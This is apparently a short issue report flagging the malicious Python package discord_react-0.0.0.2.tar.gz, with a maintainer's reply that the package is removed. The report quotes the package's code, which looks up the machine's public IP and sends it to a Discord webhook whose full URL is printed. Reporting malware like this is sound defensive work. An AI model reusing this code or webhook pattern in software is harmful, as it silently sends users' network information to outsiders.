find malicious package discord_react-0.0.0.2.tar.gz

[Eclipsewh]

Overview This report analyzes a Python script designed to send the IP address of the machine on which it is executed to a Discord webhook. Such behavior is often indicative of malicious intent, as it involves collecting potentially sensitive information (the IP address) and sending it to an external server without user consent.

Script Analysis The script performs the following key functions:

1. IP Address Retrieval:

def get_ip(): with urllib.request.urlopen('https://api.ipify.org?format=json') as response: ip_info = json.loads(response.read()) return ip_info The script uses the api.ipify.org service to obtain the public IP address of the machine.

2. Sending Data to Discord Webhook:

webhook_url = 'https://discord.com/api/webhooks/1243998916026831043/Vhhv-m25PgiSF14Gxo-Uiw0dKXiPeEOn9D1-18oupWFjPfzOgaQTUrkRfbhsIuZTVJYI' ip_info = get_ip() send_to_discord(webhook_url, str(ip_info)) The IP address is then sent to a Discord webhook URL, potentially exposing the machine's location and network information.

[shankerwangmiao]

Hello, the package you mentioned is removed.